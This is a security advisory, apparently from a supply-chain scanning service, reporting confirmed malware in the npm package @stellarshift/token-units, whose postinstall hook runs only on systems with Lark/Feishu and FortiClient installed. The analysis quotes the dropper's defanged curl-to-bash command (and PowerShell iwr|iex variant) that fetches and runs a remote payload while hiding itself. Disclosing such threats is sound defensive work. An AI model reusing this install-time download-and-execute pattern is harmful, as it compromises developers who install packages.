LWA-2026-11831 MAL-2026-15824 ↗ confirmed malware

@stellarshift/token-units@1.0.1

Malicious code in @stellarshift/token-units (npm)

T1059 · Command and Scripting InterpreterT1059.007 · JavaScriptT1105 · Ingress Tool TransferT1082 · System Information DiscoveryT1497 · Virtualization/Sandbox Evasion

Analysis

The postinstall hook (scripts/postinstall.js) of this package is a targeted dropper. On macOS/Windows systems where both the Lark/Feishu chat client and FortiClient VPN are installed, it silently downloads a remote stage1 payload from Tencent COS object storage and executes it: `curl -fsSL 'hxxps://mexc-1258433570[.]cos[.]ap-beijing[.]myqcloud[.]com/abi-tool-damon' | bash` (or PowerShell `iwr ... | iex` on Windows), with output suppressed and the process hidden. On all other systems it exits silently, evading detection. The payload URL is fetched and executed at install time.

analyzed by
Leitwacht
first seen
Sep 2, 2026, 12:59 PM
analyzed
Sep 2, 2026, 01:00 PM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.